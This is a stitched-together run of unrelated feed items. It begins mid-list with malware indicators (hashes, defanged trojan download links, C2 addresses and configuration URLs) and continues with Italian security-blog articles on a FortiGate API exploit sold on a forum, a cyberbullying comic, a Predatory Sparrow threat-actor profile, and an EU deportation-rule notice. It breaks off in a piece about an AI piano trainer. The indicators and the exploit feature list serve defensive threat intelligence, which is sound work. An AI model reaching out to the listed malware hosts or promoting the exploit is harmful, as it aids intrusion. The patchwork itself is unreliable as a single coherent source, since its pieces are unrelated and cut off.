2accfc13aaf4fa389149c0a03ce0ee4b
5b2e4ea7ab929c766c9c7359995cdde0
5e47604058722dae03f329a2e6693485
9aeaf9a485a60dc3de0b26b060bc8218
21a257e3b51561e5ff20005ca8f0da65
0752edcf5fd61b0e4a1e01371ba605fd
489217cca81823af56d141c985bb9b2c
b0976d46970314532bc118f522bb8a6f
f0460bdca0f04d3bd4fc59d73b52233b
f0815908bafd88d71db660723b65fba4
6fe6885b8f6606b25178822d7894ac35

Download links for infected apps

hxxps://lt.laoqianf14[.]top/KJnn
hxxps://lt.laoqianf15[.]top/KJnn
hxxps://lt.laoqianf51[.]top/KJnn
hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677
hxxps://xt.xinqianf38[.]top/RnZr

Pages distributing Trojans

hxxps://accgngrid[.]com
hxxps://byteepic[.]vip

C2 and configuration storage

C2:
23.249.28[.]88
120.79.8[.]107
23.249.28[.]200
47.119.171[.]161
api.fxsdk.com

Configurations
hxxp://120.78.239[.]17:10011/req.txt
hxxp://39.108.186[.]119:10011/req.txt
hxxps://dhoss-2023.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://gitee[.]com/bbffipa/data-group/raw/master/02WBUfZTUvxrTMGjh7Uh
hxxps://ok2025-oss.oss-cn-shenzhen.aliyuncs[.]com/ip/FM4J7aWKeF8yK
hxxps://file-ht-2023.oss-cn-shenzhen.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://afwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://zx-afjweiofwe.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://dxifjew2.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://data-sdk2.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
hxxps://1111333[.]cn-bj.ufileos[.]com/file/SGTMnH951121
hxxps://tbetter-oss.oss-accelerate.aliyuncs[.]com/ip/CF4J7aWKeF8yKVKu
hxxps://photo-php-all.s3[.]ap-southeast-1.amazonaws[.]com/app/domain.json
hxxps://c1mon-oss.oss-cn-hongkong.aliyuncs[.]com/J2A3SWc2YASfQ2
hxxps://tbetter-oss.oss-cn-guangzhou.aliyuncs[.]com/ip/JZ24J7aYCeNGyKVF2
hxxps://data-sdk.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121

Paths

/sdcard/aray/cache/devices/.DEVICES

securelist.com/sparkkitty-ios-…

Un nuovo e allarmante sviluppo sta scuotendo il panorama della sicurezza informatica: un attore malevolo ha pubblicizzato sul dark web un exploit altamente sofisticato volto a compromettere dispositivi FortiGate.

Si tratta di un nuovo exploit venduto al prezzo di 12.000 dollari per firewall FortiGate che è apparso in vendita sul noto forum underground Exploit. Il post, pubblicato da un utente con lo pseudonimo Anon-WMG, presenta uno strumento capace di compromettere in modo massivo dispositivi Fortinet sfruttando le API esposte.

Caratteristiche tecniche dell’exploit

Denominato “FortiGate API Dump Exploit (~7.2 e versioni inferiori)”, il tool è in grado di interagire con oltre 170 endpoint delle API FortiGate, con compatibilità dichiarata per le versioni 6.x e 5.x, e testato anche su 7.2.6 e precedenti. Le funzionalità includono:

• Dump automatico da più di 170 endpoint API Fortinet
• Estrazione di informazioni sensibili: configurazioni firewall, utenti VPN locali, portali SSL, backup, chiavi SNMP, parametri DNS, HA e NTP
• Supporto al multithreading (oltre 20 thread) per scansioni rapide e massicce
• Output in formato JSON e file di configurazione strutturati
• Headers stealth e modulo di reporting dedicato (“Report Runner”)

Lo strumento prende di mira:

• Firewall FortiGate con API esposte (porte predefinite: 443 e 10443)
• Portali SSL/VPN configurati in modo errato

L’autore sostiene che l’exploit sia in grado di compromettere:

• Credenziali di rete interne e amministrative (inclusi hash e password cifrate)
• Token attivi SAML/RADIUS/LDAP
• Token VPN e ID di sessioni IPSec
• Backup completi di configurazione dei dispositivi

Impatto e diffusione e prezzo di vendita

Le implicazioni sono gravi e includono:

• Accesso alla rete interna e lateral movement
• Furto di configurazioni, backup e credenziali
• Compromissione di comunicazioni VPN in corso
• Possibilità di escalation attraverso token utente legittimi

Il tool risulta testato su numerose versioni di FortiOS: v6.0.9, 6.2.5, 7.0.4, 7.2.1, 7.2.6, 6.2.x e altre.

• Prezzo richiesto: 12.000 dollari
• Pagamento in criptovaluta
• Trattativa tramite escrow per garantire (almeno formalmente) la transazione
• Forniti alcuni sample tramite link temporaneo su “send.exploit.in”
• L’autore avverte di contattarlo solo in caso di reale intenzione d’acquisto

Contromisure e raccomandazioni

Le organizzazioni che utilizzano FortiGate devono agire immediatamente, soprattutto se:

• Le interfacce API sono esposte direttamente su Internet
• I dispositivi eseguono versioni obsolete del firmware
• I portali VPN/SSL non sono configurati correttamente

Raccomandazioni operative:

• Eseguire un audit immediato delle interfacce esposte
• Aggiornare tutti i dispositivi alla versione FortiOS più recente e supportata
• Limitare l’accesso alle API solo a indirizzi IP interni o autorizzati
• Abilitare i log API per individuare attività sospette
• Revocare e rigenerare i token VPN attivi, verificando l’integrità delle configurazioni

Conclusioni

La disponibilità di un exploit automatizzato come questo sul mercato underground evidenzia una volta di più quanto sia critico esporre anche solo parzialmente interfacce di gestione non adeguatamente protette. In questo caso, l’accesso non autenticato alle API FortiGate può portare al completo compromesso di una rete.

L'articolo FortiGate sotto attacco: in vendita tool per lo sfruttamento massivo delle API esposte proviene da il blog della sicurezza informatica.

Oggi, 23 giugno 2025, esce “Byte The Silence”, il nuovo fumetto sul cyberbullismo realizzato da Red Hot Cyber, è disponibile da oggi gratuitamente in formato elettronico, sulla nostra piattaforma di Academy. Si tratta delquarto episodio della collana a fumetti firmata BETTI‑RHC, pensata per raccontare in maniera accessibile, potente e visiva i pericoli delle minacce digitali, in particolare per i più giovani.

“Byte The Silence” è molto più di una semplice lettura: è un’esperienza narrativa profonda, costruita su oltre 60 tavole illustrate che raccontano con sensibilità e impatto la storia di una vittima di cyberbullismo. Il titolo – un gioco di parole tra “Byte”, unità di misura digitale, e “Break the Silence” – invita a rompere il muro del silenzio che spesso circonda chi subisce abusi online. Il fumetto nasce per essere uno strumento educativo, ma anche un modo per dare voce a chi troppo spesso viene zittito dal peso della vergogna o della paura.

Scarica gratuitamente Byte The Silence, il fumetto gratuito sul cyberbullismo realizzato da Red Hot Cyber accedendo alla nostra Academy.

Un fumetto gratuito per non dimenticare

Perché come riporta Massimiliano Brolli, fondatore di Red Hot Cyber, “Non possiamo dimenticarci di Carolina Picchio, 14 anni, suicidatasi dopo la diffusione di un video umiliante online. Michele Ruffino, 17 anni, che ha scritto una lettera straziante prima di togliersi la vita, stanco delle continue offese ricevute anche via social. Alessandro di Gragnano che ha deciso di togliersi la vita a 13 anni lanciandosi dal balcone, circondato da chat minacciose e prese in giro. Oppure il 15enne suicida di Sinigallia o il 13enne suicida di Palermo oltre a molti e molti casi stranieri.”

Il progetto è stato curato dal team Arte di Red Hot Cyber, con la sceneggiatura diAndrea Gioia Lomoro e i disegni di Andrea Canolintas e i messaggi di Awareness di Daniela Farina. Tutti gli autori hanno saputo fondere con efficacia narrativa e impatto visivo, dando vita ad una storia dove vengono raccontate emozioni autentiche e situazioni purtroppo comuni a tanti adolescenti. Il fumetto tocca temi come l’esclusione sociale, le chat discriminatorie, il peso del giudizio online e le conseguenze psicologiche del bullismo digitale.

Un messaggio forte: un like ferisce, una risata uccide e il silenzio può distruggere

“Byte The Silence” è un richiamo a tutti gli adulti e gli educatori a prendersi carico della protezione delle nuove generazioni. “Il cyberbullismo è uno dei fenomeni più gravi e subdoli dell’era digitale. Può causare danni psicologici devastanti, spesso irreparabili. Con questo progetto vogliamo dire basta all’indifferenza. È nostro dovere dare strumenti concreti e gratuiti a chi vuole fare la differenza”.

Scarica gratuitamente Byte The Silence, il fumetto gratuito sul cyberbullismo realizzato da Red Hot Cyber accedendo alla nostra Academy.

Il fumetto è pensato per un pubblico ampio: dagli studenti delle scuole medie e superiori, ai genitori, agli insegnanti, agli educatori e operatori sociali senza dimenticarsi dei bulli stessi. Red Hot Cyber incoraggia la diffusione del fumetto, proponendolo come strumento formativo nei percorsi di educazione digitale e cyber security awareness. La possibilità di scaricarlo gratuitamente in formato PDF vuole abbattere qualsiasi barriera all’accesso, perché la prevenzione e la sensibilizzazione devono essere un diritto per tutti.

“Byte The Silence” ci ricorda che ogni click, ogni parola, ogni silenzio conta.

E che un semplice fumetto può accendere una coscienza, cambiare uno sguardo o salvare una vita.

Da oggi, chiunque può contribuire a diffondere questo messaggio. Basta un download. Basta un gesto.

Perché un like può ferire. Una risata può uccidere. E il silenzio può distruggere.

Ma oggi, insieme, possiamo farcela!

Scarica gratuitamente Byte The Silence, il fumetto gratuito sul cyberbullismo realizzato da Red Hot Cyber accedendo alla nostra Academy.

L'articolo “Byte The Silence”: Il Fumetto Shock Gratuito di RHC sul Cyberbullismo Esce Oggi! proviene da il blog della sicurezza informatica.

The European Commission’s new legislative proposal for a deportation regulation fuels detention, criminalisation, and digital surveillance. The #ProtectNotSurveil coalition is demanding the end of the deportation regime and for the Commission to withdraw its proposal.

The post The EU must stop the digitalisation of the deportation regime and withdraw the new Return Regulation appeared first on European Digital Rights (EDRi).

Il 17 giugno 2025 un attacco informatico ha paralizzato Bank Sepah, una delle principali istituzioni finanziarie dell’Iran.

L’attacco è stato rivendicato dal gruppo Predatory Sparrow, già noto per le sue operazioni distruttive contro infrastrutture critiche iraniane. Nel presente documento vi è un’analisi approfondita del Threat Actor Predatory Sparrow, delle sue capacità tecniche e degli obiettivi dichiarati, con particolare attenzione al contesto geopolitico e all’uso di malware proprietari.

Autori:

• Cyber Defence Center Maticmind
• Cyber Competence Center Maticmind
• Andrea Mariucci | Head of Cyber Defence Center @Maticmind
• Riccardo Michetti | Cyber Threat Intelligence Manager @Maticmind
• Federico Savastano | Cyber Threat Intelligence Analyst @Maticmind
• Ada Spinelli | Cyber Threat Intelligence Analyst @Maticmind

SCHEDA THREAT ACTOR: PREDATORY SPARROW

Nome Principale: Predatory Sparrow
Nomi Alternativi: – Gonjeshke Darande (گنجشک درنده – traduzione in farsi) – Indra (overlap parziale, similitudini nel codice dei malware utilizzati)
Classificazione: Gruppo hacktivista pro-israeliano
Primo Avvistamento: 2021
Stato Attuale: Attivo (ultima attività documentata: giugno 2025)

IDENTITÀ E AFFILIAZIONI

Predatory Sparrow si presenta come un gruppo di hacktivisti autoproclamato, ma la sua sofisticazione tecnica e le capacità operative suggeriscono un probabile coinvolgimento governativo o militare. Secondo un articolo di WIRED, fonti della difesa statunitense hanno riferito al New York Times che il gruppo era collegato a Israele.

Il gruppo, nato nel 2021, è entrato in stato di quiescenza tra il 2022 e l’ottobre 2023, tornando operativo all’avvio delle ostilità nella striscia di Gaza.

Diamond Model

Motivazioni e Obiettivi

• Obiettivo Primario: Condurre attacchi distruttivi contro l’Iran, allo scopo di infliggere danni paragonabili a quelli di attacchi convenzionali, con effetti nella sfera psicologica, per indebolire la fiducia della popolazione nel regime degli Ayatollah e la tenuta di questo, in un quadro di operazioni PSYOPS, campagne di disinformazione e azioni di sabotaggio, causando al contempo conseguenze economiche significative alle aziende iraniane connesse con il governo o con l’esercito.
• Motivazione Geopolitica: Si inserisce all’interno del confronto tra Israele, Iran e i proxy di quest’ultimo, allo scopo di rispondere agli attacchi condotti dalla Repubblica islamica direttamente o tramite proxy.
• Valenza strategica: affermare la capacità offensiva dell’attore nel colpire asset industriali e digitali critici in territorio iraniano, con l’obiettivo di esercitare pressione e destabilizzazione mirata.
• Tattiche di rivendicazione e propaganda
  
  • Utilizza canali X e Telegram per rivendicare gli attacchi
  • Pubblica video come prova degli attacchi riusciti, come nel caso del video dell’attacco distruttivo all’acciaieria iraniana
  • Include messaggi provocatori con riferimenti al Leader Supremo Iraniano
  • Si presenta talvolta come gruppo hacktivisti Iraniano per confondere l’attribuzione
  • Apparentemente, il gruppo conduce attacchi con il criterio dichiarato di non mettere a repentaglio vite innocenti (come riportato sul canale Telegram del TA e riportato da BBC)

  
  

CAPACITÀ TECNICHE

Il gruppo dimostra capacità tecniche avanzate che lasciano intendere l’accesso a risorse significative, una conoscenza approfondita dei sistemi industriali iraniani, nonché la capacità di sviluppare malware su misura per obiettivi specifici. Inoltre, evidenzia competenze rilevanti nei sistemi SCADA e ICS (Industrial Control Systems), utilizzati nel controllo di infrastrutture critiche. Rispetto alla maggior parte degli hacktivisti che intervengono su tematiche geopolitiche o di attualità, Predatory Sparrow si distingue per un know-how tecnico notevolmente superiore, che risulta tipico di attori collegati ad apparati statuali.

Settori di Specializzazione

Sistemi di Controllo Industriale (ICS/SCADA)

• Capacità di manipolare equipaggiamento industriale
• Accesso a sistemi di controllo di acciaierie e pompe di benzina
• Interferenza con sistemi ferroviari

Sistemi di Pagamento

• Compromissione di reti point-of-sale
• Attacchi a sistemi di carte di sussidio carburante
• Compromissione di Crypto Exchange
• Compromissione di enti finanziari

Infrastrutture Critiche

• Sistemi ferroviari nazionali
• Reti di distribuzione carburante
• Impianti siderurgici

TOOLSET E MALWARE

Sulla base delle informazioni attualmente disponibili, si ritiene che il gruppo sia in possesso di varianti del wiper “Meteor”, comparso per la prima volta nel 2021 e utilizzato da un threat actor denominato “Indra” contro infrastrutture siriane. Questo fattore potrebbe indicare una parziale sovrapposizione tra i due threat actor.

Lo strain di “Meteor” comprende diverse versioni, note come “Stardust” e “Comet”, sempre con funzionalità di wiper. “Chaplin” risulta invece essere il malware utilizzato nell’attacco alle acciaierie iraniane, non dotato di capacità di cancellazione dei dati ma di compromissione e controllo dei sistemi industriali.

Meteor Express (2021)

Meteor Express è un malware di tipo wiper a tre stadi, sviluppato tramite una combinazione di componenti open source e software legacy. Il codice è altamente modulare e progettato per operazioni distruttive mirate a infrastrutture strategiche.

Funzionalità principali

1. Sovrascrittura e cancellazione di file di sistema.
2. Blocco dell’accesso utente e terminazione dei processi.
3. Cancellazione del Master Boot Record (MBR).
4. Disabilitazione delle interfacce di rete.
5. Cambio delle password per tutti gli utenti
6. Log off delle sessioni attive
7. Disabilitazione della recovery mode

Kill Chain

• Reconnaissance: Presunta fase iniziale di raccolta informazioni tramite accessi precedenti alla rete target.
• Weaponization: Uso di componenti dropper e script batch per il rilascio dei payload.
• Delivery: Infezione attraverso accesso fisico/logico alle macchine o vulnerabilità RDP.
• Installation: Scrittura su disco di tool e script batch eseguiti in sequenza.
• Command and Control: Non presente in quanto malware non persistente e senza C2 attivo.
• Actions on Objectives: Distruzione dei dati, blocco degli account, sabotaggio del sistema operativo.

Tecniche MITRE ATT&CK correlate

• T1490 – Inhibit System Recovery
• T1485 – Data Destruction
• T1562.001 – Impair Defenses: Disable or Modify Tools
• T1489 – Service Stop
• T1491.001 – Defacement: Internal Defacement
• T.1531 – Account Access Removal

• Contesto operativo
  Attacco lanciato nel luglio 2021 contro la rete ferroviaria iraniana. L’obiettivo apparente era la destabilizzazione dell’infrastruttura pubblica e la generazione di caos operativo su larga scala.
• Attribuzione
  Malware attribuito al gruppo Indra.
• Valutazione di impatto

• Tecnico: Paralisi totale del sistema informatico ferroviario, con disservizi prolungati e blocchi operativi.
• Psicologico: Tentativo di disorientare l’opinione pubblica iraniana attraverso il sabotaggio simbolico.
• Obiettivo operativo: Operazione PSYOPS volta a delegittimare il governo iraniano e dimostrare la vulnerabilità delle infrastrutture pubbliche strategiche.

• Indicatori di Compromissione (IoCs)
• Directory di staging: %temp%\Meteor\

Comet (2021)

Malware wiper simile a Meteor ma privo di payload provocatori. Architettura a tre stadi, con codice misto tra componenti open e legacy.

Funzionalità principali

• Cancellazione file.
• Blocco utente e sistema.
• Disattivazione strumenti di logging.

Kill Chain

• Delivery: Script locali o remotizzati.
• Execution: Blocco e visualizzazione contenuti.
• Impact: Interruzione della normale operatività utente.

Tecniche MITRE ATT&CK correlate

• T1490 – Inhibit System Recovery
• T1485 – Data Destruction
• T1562.001 – Impair Defenses: Disable or Modify Tools
• T1489 – Service Stop
• T1491.001 – Defacement: Internal Defacement
• T.1531 – Account Access Removal
• Contesto operativo
• Uso in attacchi silenziosi contro infrastrutture critiche.
• Attribuzione
• Malware attribuito al gruppo Indra.
• Valutazione di impatto

• Tecnico: Elevato.
• Psicologico: Consistente, in quanto crea disservizio e mina la fiducia nelle infrastrutture statali
• Obiettivo operativo: Sabotaggio silenzioso e persistente.

Stardust (2020)

Wiper distruttivo impiegato in attacchi mirati contro obiettivi siriani. Simile a Comet, ma specificamente orientato alla distruzione sistematica dei dati sensibili.

Funzionalità principali

• Sovrascrittura file sensibili.
• Interruzione del sistema.
• Blocco del boot.

Kill Chain

• – Delivery: Tramite accesso ai sistemi vulnerabili.
• – Execution: Esecuzione del wiper su endpoint.
• – Impact: Eliminazione dei dati sensibili e blocco operativo.

Tecniche MITRE ATT&CK correlate

• T1485 – Data Destruction
• T1490 – System Recovery Inhibition
• T1499 – DoS
• Contesto operativo
• Attacchi contro aziende siriane strategiche, senza elementi rivendicativi.
• Attribuzione
• Malware attribuito al gruppo Indra.
• Valutazione di impatto

• Tecnico: Critico, distruzione completa dei dati.
• Psicologico: Contenuto, in quanto assente la componente narrativa.
• Obiettivo operativo: Danneggiamento economico e operativo.

Chaplin (2022)

Evoluzione del malware Meteor, classificabile come disruptive malware. Manca la componente wipe, ma introduce azioni visivamente provocatorie.

Funzionalità principali

1. Disconnessione dalla rete.
2. Logout forzato dell’utente.
3. Blocco dello schermo.
4. Visualizzazione messaggi provocatori.

Kill Chain

• Delivery: Script locali o remoti.
• Execution: Blocco e visualizzazione contenuti.
• Impact: Interruzione della normale operatività utente. Comandi inviati ai sistemi industriali che ne causano il malfunzionamento

Tecniche MITRE ATT&CK correlate

• T1531 – Account Access Removal
• T1499 – Endpoint Denial of Service
• T1551 – Input Capture (blocco schermo)
• Contesto operativo
  
  • Probabilmente impiegato in attacchi dimostrativi o a basso impatto distruttivo.

  
  

• Attribution
  
  • Non nota, ma verosimilmente collegata agli stessi attori di Meteor.

  
  

• Valutazione di impatto

• Tecnico: Limitato ma visibile.
• Psicologico: Elevato, per via dei messaggi diretti (es. invito a chiamare l’ufficio del Leader Supremo iraniano).
• Obiettivo operativo: Guerra psicologica, dimostrazione di capacità.

Timeline degli Attacchi Principali

Attacco alle Stazioni di Servizio

Data: Ottobre 2021
Obiettivo: Oltre 4.000 stazioni di servizio in Iran (sistema di distribuzione carburante)
Metodo d’attacco: Compromissione dei sistemi point-of-sale
Impatto:

• Disattivazione del sistema di pagamento con carte sovvenzionate
• Paralisi temporanea della distribuzione di carburante su scala nazionale

MITRE ATT&CK TTPs:

• T1190 (Exploit Public-Facing Application)
• T1486 (Data Encrypted for Impact)

Malware/Toolset: Non noto
Attribution: Predatory Sparrow
Impatto Strategico: Interruzione dei servizi essenziali per aumentare la pressione interna

Attacco alle Acciaierie Iraniane

Data: Giugno 2022
Obiettivo: Tre principali acciaierie iraniane (Khouzestan, Mobarakeh, HOSCO)

Metodo d’attacco: Malware Chaplin + manipolazione dei sistemi di controllo industriale (ICS)
Impatto:

• Fuoriuscita di acciaio fuso (oltre 1.300°C)
• Incendio nell’impianto
• Interruzione delle operazioni produttive

MITRE ATT&CK TTPs:

• T0859 (Manipulation of Control)
• T0882 (Loss of Safety)
• T0814 (Alarm Suppression)

Malware/Toolset: Chaplin
Attribution: Predatory Sparrow
Impatto Strategico: Danneggiamento delle capacità industriali critiche e dimostrazione di capacità offensive contro ICS

Figura 1 – Telecamera sorveglianza

Riattivazione – Conflitto Gaza-Israele

Data: Ottobre 2023
Contesto: Conflitto israelo-palestinese
Messaggio: “Pensate che questo faccia paura? Siamo tornati.”
Obiettivo: Nuovi attacchi a stazioni di servizio in Iran
Metodo d’attacco: Continuazione della strategia disruption verso infrastrutture civili
Impatto: Non specificato nel dettaglio ma coerente con attacchi precedenti
MITRE ATT&CK TTPs: presumibilmente analoghi all’evento di Ottobre 2021
Attribution: Predatory Sparrow
Impatto Strategico: Segnale politico e ritorsione cibernetica in chiave geopolitica

Attacco Bank Sepah

Data: 17 giugno 2025

Obiettivo: Bank Sepah – uno degli istituti finanziari pubblici più antichi dell’Iran
Metodo d’attacco: Attacchi informatici distruttivi con probabile uso di wiper (es. Comet/Stardust)
Impatto:

• Interruzione delle operazioni bancarie
• Impossibilità per i cittadini di prelevare denaro dagli sportelli ATM
• Diffusione di CVE pubblici da parte dell’attore (es. cve_poc_codes_export_works.csv)

MITRE ATT&CK TTPs:

• T1485 (Data Destruction)
• T1499 (Endpoint Denial of Service)
• T1588.006 (Vulnerability Disclosure)

Malware/Toolset: Presunta variante wiper simile a Meteor / Comet / Stardust
Attribution: Predatory Sparrow (evidenza su Telegram + X)
Impatto Strategico: Destabilizzazione del sistema bancario nazionale e perdita di fiducia nella capacità del governo iraniano di proteggere dati finanziari

Al momento non si conoscono dettagli sulle tecniche, tattiche e procedure (TTP) utilizzate dal threat actor, benché la cancellazione dei dati con conseguente paralisi delle operazioni faccia propendere per l’ipotesi dell’impiego di una versione dei wiper “proprietari” del gruppo, come Meteor, Stardust o Comet. Nella giornata del 16/06, sul proprio canale Telegram il gruppo aveva diffuso una lista di cve ancora funzionati, dal titolo “cve_poc_codes_export_works”.

Figura 2 – Cve diffusa su canale Telegram del TA

Secondo fonti presenti su X, i cittadini iraniani erano impossibilitati a prelevare denaro contante dagli ATM del Paese.

Figura 3 – Sportello banca in disservizio

Tale fattore, unito ai timori relativi al furto di dati sensibili dalle banche colpite, contribuisce all’aggravamento dello scenario e sottolinea le capacità da cyberwar in possesso del Threat Actor.

Figura 4 – Documentazione Bank Sepah

A differenza di molti hacktivisti, infatti, Predatory Sparrow non si è limitato ad un Denial of Service (DoS), ma ha mostrato capacità tecnologiche avanzate e determinazione nel procurare danni su vasta scala.

Al momento non si hanno informazioni ulteriori sullo stato dei servizi erogati dalle banche colpite ma, nel caso in cui tali disservizi dovessero protrarsi, ciò rappresenterebbe un danno considerevole alla capacità dell’Iran di rispondere alle minacce cibernetiche e potrebbe contribuire a generare malcontento e tensioni tra la popolazione colpita.

Attacco Nobitex

Data: 18 giugno 2025

Obiettivo: Nobitex – sito iraniano di crypto exchange
Metodo d’attacco: Al momento non si hanno informazioni inerenti alla metodologia di attacco utilizzata
Impatto:

• Distruzione asset crypto per un totale di 90 milioni di dollari
• Sito nobitex[.].ir ancora offline a 24h dall’attacco

MITRE ATT&CK TTPs:

• T1485 (Data Destruction)
• T1499 (Endpoint Denial of Service)
• T1588.006 (Vulnerability Disclosure)

Malware/Toolset: Presunta variante wiper simile a Meteor / Comet / Stardust
Attribution: Predatory Sparrow
Impatto Strategico: Destabilizzazione del sistema valutario di crypto exchange iraniano. Recisione di una linea di finanziamento che permetteva all’Iran di aggirare, parzialmente, le sanzioni occidentali. Effetti psicologici come la diffusione di panico e incertezza riguardo la resilienza degli asset iraniani nel cyberspazio.

Figura 5 – Nobitex[.]ir ancora irraggiungibile nella giornata del 19/06, a un giorno dall’attacco

Predatory Sparrow ha attaccato il sito di exchange di criptovalute iraniano “Nobitex” nella giornata del 18 giugno, soltanto un giorno dopo l’attacco a Sepah Bank. La motivazione dichiarata è la medesima, ovvero l’evasione delle sanzioni imposte all’Iran e il finanziamento del terrorismo. Su X, Predatory Sparrow ha anche sottolineato il nesso tra le attività del regime e quelle di Nobitex, dichiarando che, per il governo iraniano, il servizio presso l’exchange di criptovalute è considerato alla stregua del servizio militare.

Il Threat Actor non ha sottratto le criptovalute, ma ne ha di fatto bruciato un ammontare pari a 90 milioni di dollari, inviandole verso indirizzi inutilizzabili (“burn addresses”), da cui non possono essere recuperate. La tecnica adoperata sottolinea l’obiettivo di Predatory Sparrow di arrecare danno senza alcuna finalità di monetizzazione o finanziamento, come sotteso anche dal ricorso ai wiper.

In data 20/06/2025 threat actor ha inoltre reso pubblico il source code di Nobitex, mettendo a rischio gli asset ancora presenti sul sito e rendendo più facile l’accesso e l’exploit da parte di ulteriori attori malevoli. Questa divulgazione del codice sorgente amplifica la vulnerabilità del sistema, consentendo agli aggressori di identificare rapidamente punti deboli e sviluppare exploit mirati.

Figura 6 – Post con cui Predatory Sparrow rende pubblico il codice sorgente di Nobitex, https://x.com/GonjeshkeDarand/status/1935593397156270534

Al momento non si hanno ulteriori dettagli sulle tecniche, tattiche e procedure (TTP) utilizzate dal threat actor in questa operazione.

VALUTAZIONE DEL RISCHIO

• Livello di Minaccia: ALTO
• Determinanti di minaccia: – Capacità dimostrate di causare danni fisici – Accesso persistente a infrastrutture critiche – Sofisticazione tecnica in crescita – Motivazione geopolitica forte
• Settori a rischio: – Infrastrutture energetiche – Sistemi di trasporto – Industria pesante – Sistemi di pagamento – Settore bancario e finanziario

Indicatori di Attacco (IoA)

• Presenza di file denominati “Chaplin”
• Messaggi di sistema con riferimenti al numero 64411
• Disconnessioni anomale dalla rete
• Malfunzionamenti di sistemi industriali coordinati
• Indirizzi wallet crypto recanti messaggi diretti contro le Guardie della repubblica islamica (Islamic Republic Guard Corps IRGC) del tipo “F*ckIRGCterrorists”

CONTROMISURE

Sulla base delle evidenze presentate all’interno del report, si formulano alcune raccomandazioni e contromisure utili a minimizzare o contenere danni provenienti dall’attore qui descritto o da eventuali gruppi emulatori.
Considerata la mancanza di informazioni dettagliate sulle compromissioni, a fronte della mancata disclosure da parte degli enti iraniani colpiti, si presentano qui alcune considerazioni generali atte a ridurre l’impatto dei malware tipo “wiper” come Meteor e di altri tool utilizzati in contesti di cyber warfare e cyber-espionage come InfoStealer e SpyWare. Inoltre, considerando la presenza di un elenco di CVE con i relativi link alle Proof of Concept pubblicate direttamente dal Threat Actor sul proprio canale Telegram, dove viene evidenziato che si tratta di exploit ancora funzionanti, si può ipotizzare che Predatory Sparrow utilizzi anche applicazioni esposte e vulnerabili come vettore di accesso iniziale, verranno pertanto suggerite delle raccomandazioni per proteggere la superficie di attacco esposta.

Al fine di contenere la propagazione di un wiper all’interno della rete, è opportuno adattare una segmentazione rigida, che separi reti OT da IT, anche attraverso il ricorso ad architetture Zero Trust e stretto controllo degli accessi.

Al tempo stesso, il backup separato, air-gapped, associato a piani di ripristino e disaster recovery, consente il recupero della normale operatività in caso di compromissione.

Il patching, la chiusura delle porte superflue esposte su internet e la disabilitazione dei servizi non necessari sono altresì misure utili a ridurre la superficie di attacco e a minimizzare il rischio derivante dalle applicazioni esposte.

Honeypot ICS/SCADA consentono inoltre di rilevare anomalie e intrusioni prima che attori malevoli raggiungano le aree critiche per l’operatività industriale.

Ultimo Aggiornamento: 20 giugno 2025

Fonti Primarie e Database

• Malpedia Threat Actor Database: malpedia.caad.fkie.fraunhofer.…

Articoli di Analisi e Reportage

• Jason Institute jasoninstitute.com/predatory-s…
• Wired Magazine (2024-01-25): “How a Group of Israel-Linked Hackers Has Pushed the Limits of Cyberwar” – wired.com/story/predatory-spar…
• Heimdal Security (2021): “MeteorExpress Wiper Responsible for the Iranian Railway Attack” heimdalsecurity.com/blog/meteo…
• Dark Reading (2023-10-10): “Pro-Israeli Hacktivist Group ‘Predatory Sparrow’ Reappears” – darkreading.com/threat-intelli…
• BBC Technology (2022-07-11): “Predatory Sparrow: Who are the hackers who say they started a fire in Iran?” – bbc.com/news/technology-620724…
• Risky Biz News (2022-06-29): “Hackers hit Iranian steel industry” – riskybiznews.substack.com/p/ri…
• Reuters: reuters.com/business/finance/e…
• Binding Hook (2024-12-09): bindinghook.com/articles-bindi…
• IranInternational: iranintl.com/en/202506176243
• Check Point Research: research.checkpoint.com/2021/i…
• CyberScoop (2023-10-10): “Savvy Israel-linked hacking group reemerges amid Gaza” – cyberscoop.com/predatory-sparr…
• SecureWorld (2022-06-29): “Cyberattack on Iranian Steel Industry Disrupts Operations” – secureworld.io/industry-news/c…
• ANSA (2025-06-17): “Banca pubblica iraniana paralizzata da cyber attacco” – ansa.it/canale_tecnologia/noti…-86d9-4f88b6c7e601.html[/url]
• The Record (2025): “Pro-Israel hackers claim breach of Iranian bank amid…” – therecord.media/pro-israel-hac…
• Security Affairs (2024): “Pro-Israel Predatory Sparrow hacker group disrupted…” – securityaffairs.com/156065/hac…
• bleepingcomputer.com/news/secu…
• El País (2024-02-14): “Predatory Sparrow and other weapons of hybrid warfare” – english.elpais.com/technology/…
• Haaretz (2023-12-26): “When Predatory Sparrow Strikes: Israel-Iran Shadow War…” – haaretz.com/israel-news/securi…
• The Independent (19/06/25) “Pro-Israel hackers ‘burn’ $100m from Iran’s biggest crypto exchange”
• independent.co.uk/tech/iran-cr…
• Fonti Accademiche e Istituzionali
• NATO CCD COE Cyber Law (2022): “Predatory Sparrow operation against Iranian steel maker” – cyberlaw.ccdcoe.org/wiki/Preda…
• Social media e app di messaggistica
• Telegram e X: canali del Threat Actor
• X: https://x.com/GonjeshkeDarand
• Telegram: t.me/gonjeshkdarand

L'articolo Alla scoperta di Predatory Sparrow. identità, obiettivi e arsenale digitale del misterioso attore minaccia proviene da il blog della sicurezza informatica.

Learning new instruments is never a simple task on your own; nothing can beat the instant feedback of a teacher. In our new age of AI, why not have an AI companion complain when you’re off note? This is exactly what [Ada López] put together with their AI-Powered Piano Trainer.

The basics of the piano rely on rather simple boolean actions, either you press a key or not. Obviously, this sets up the piano for many fun projects, such as creative doorbells or helpful AI models. [Ada López] started their AI model with a custom dataset with images of playing specific notes on the piano. These images then get fed into Roboflow and trained using the YOLOv8 model.

